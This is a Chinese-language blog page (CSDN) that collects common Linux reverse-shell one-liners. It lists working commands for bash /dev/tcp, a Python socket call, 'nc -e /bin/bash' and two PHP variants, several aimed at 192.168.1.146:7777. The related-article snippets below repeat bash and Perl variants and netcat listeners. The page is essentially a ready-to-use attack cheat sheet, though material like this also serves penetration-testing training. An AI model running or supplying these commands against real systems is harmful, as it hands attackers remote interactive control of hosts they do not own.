[整理]inux下几种常见的反弹shell方式

最新推荐文章于 2023-05-17 16:53:40 发布
最新推荐文章于 2023-05-17 16:53:40 发布
阅读量189 收藏
点赞数
分类专栏: 萌新随笔
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_15042405/article/details/117605268
版权
本文介绍了在Linux系统中常见的四种反弹shell方法:利用bash、python、nc(netcat)和php实现远程控制。这些方法详细展示了命令格式,包括如何连接到指定IP和端口,为网络安全和渗透测试提供了实用技巧。
摘要由CSDN通过智能技术生成

[整理]Linux下几种常见的反弹shell方式

方法1:使用linux命令反弹shell

反弹shell命令格式如下:

bash -i >& /dev/tcp/ip/port 0>&1

方法2:使用python反弹shell

反弹shell命令格式如下:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

方法3:使用nc反弹shell
命令如下:

[root@localhost ~]# nc -e /bin/bash 192.168.1.146 7777

方法4:使用php反弹shell
1).使用php的exec函数执行方法1反弹shell的命令

[root@localhost ~]# php -r 'exec("/bin/bash -i >& /dev/tcp/192.168.1.146/7777");'

2).使用php的fsockopen去连接远程

命令格式如下:

php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'

执行以下命令:

[root@localhost ~]# php -r '$sock=fsockopen("192.168.1.146",7777);exec("/bin/bash -i <&3 >&3 2>&3");'
chanra
关注
专栏目录
内网渗透-反弹shell的N种姿势
lza20001103的博客
09-04 720
反弹shell的N种姿势 文章目录反弹shell的N种姿势0x00 前言0x01 Bash反弹1.1 方法一1.2 方法二1.3 方法三0x02 telnet反弹2.1 方法一2.2 方法二0x03 nc(netcat)反弹0x04 常见脚本反弹4.1 python4.2 perl4.2.1 方法一4.2.2 方法二4.3 Ruby4.3.1 方法一4.3.2 方法二4.4 PHP4.5 Java4.6 Lua0x05 总结0x06 参考连接 0x00 前言 在渗透测试的过程中,在拿到webshell以后,
经验分享 | 常用linux反弹shell合集
Uguardsec的博客
01-25 962
一、前言 当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句 来达到我们的目的。 二、反弹方法 攻击机:192.168.3.43 靶机:192.168.1.21 、192.168.249.12 1. Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0
反弹shell的N种姿势
cainsoftware的博客
10-09 266
0x00 前言 在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见几种姿势。 0x01 Bash反弹 1.1 方法一 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i 打开一
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 6217
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell常见方法总结
qq_45746681的博客
10-08 835
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
LinuxN种反弹shell方法
YUGUOHOU的博客
11-26 9956
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口, 并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络 概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器 (目标ip:目标机器端口),这是比较
inux系统 测试CPU 性能shell 脚本
02-11
本文将详细介绍如何使用shell脚本来实现这一目标,主要涉及的命令包括`cat`、`grep`、`wc`以及`sysbench`。 首先,我们要了解CPU的一些基本指标,包括处理器型号(model name)和核心数(number of cores)。在...
inux下RoseMirrorHA实施文档.doc
04-12
inux下RoseMirrorHA实施文档.doc
Linux反弹shell(一)文件描述符与重定向
Hunt Counter
10-24 359
0X00 前言 由于在反弹shell的过程中有一些精简的语句一直没有弄明白,今天特意写文章总结这里面最难的文件描述符和重定向的部分。 0X01 文件描述符 linux文件描述符:可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入standard inpu...
Linux反弹shell几种方法学习总结
weixin_34409822的博客
09-04 544
什么是反弹shell? 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)://ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建...
反弹shell
stonesharp的专栏
04-03 3379
各种反弹shell方式 - R00tGrok 时间 2014-04-06 23:27:00  博客园精华区原文  http://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html [前言:在乌云社区看到反弹shell几种姿势,考虑到乌云社区不完全对外开放,干脆自己转一下以作分享,另外还收集了点其他的,应该较为全面
几种常见反弹shell汇总
热门推荐
秋叶依剑
11-10 1万+
0x01. bash 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口号,并且此端口号没有被占用 在目标主机上执行: bash -i >& /dev/tcp/攻击主机ip/port 0>&1 //port 为攻击主机端口号 解释: bash -i 打开一个交互的bash >& 将标准...
常用的一句话反弹shell总结
橘子女侠
05-20 1万+
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹shell 6. 使用nc命令获取靶机的反弹shell; 7. 使用Kali自带的脚本文件获取反弹shell 8. 使用msfvenom 获取一句话反弹shell 常用的一句话反弹she...
Linux反弹Shell方法
weixin_43873557的博客
02-08 1918
文章目录Linux反弹Shell方法Linux标准文件描述符更改标准输出的位置更改标准输入的位置/dev/null重定向输入重定向输出重定向管道反弹shell的本质什么是反弹shell实现控制端和被控端之间的交互反弹shell方法NCBashPerlPythonPHPRubyTelnetOpenSSLRefer Linux反弹Shell方法 Linux标准文件描述符 Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。
反弹shell的十种姿势(偶然看到一些整理下)
chuancuili8770的博客
07-13 361
bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ,注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,P...
【持续更新】pip install报错解决汇总
qq_15042405的博客
12-02 7297
避坑:pip报错
frp流量代理时token的报错问题
qq_15042405的博客
03-16 3218
2022/03/16 13:50:31 [E] [service.go:316] token in login doesn’t match token from configuration 2022/03/16 13:50:31 [W] [service.go:105] login to server failed: token in login doesn’t match token from configuration 这几天研究cs上传frp打域控,结果一直报错。总结了一些解决方法: 1、token位
kali虚拟机小键盘区不能使用解决
qq_15042405的博客
06-05 2383
kali虚拟机小键盘区不能使用解决 问题:安装kali之后,kali虚拟机小键盘区不能使用,严重影响了使用体验。 方法1: 按下 shift + alt 和 NumLock 方法2: 终端输入 gksudo gedit /etc/console-tools/remap 把 #s/keycode 58 = Caps_Lock/keycode 58 = Control/; 改为 s/keycode 58 = Caps_Lock/keycode 58 = Control/; 保存修改的文件 sudo /etc/
inux c 获取进程p id,详解linux获取线程的pid(tid、lwp)的几种方式
最新发布
09-02
在Linux C编程中,我们可以使用几种不同的方式来获取进程的PID和线程的TID(Thread ID)或LWP(Lightweight Process)。 1. getpid()函数:这是最简单的方式之一,可以通过调用getpid()函数来获取当前进程的PID。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值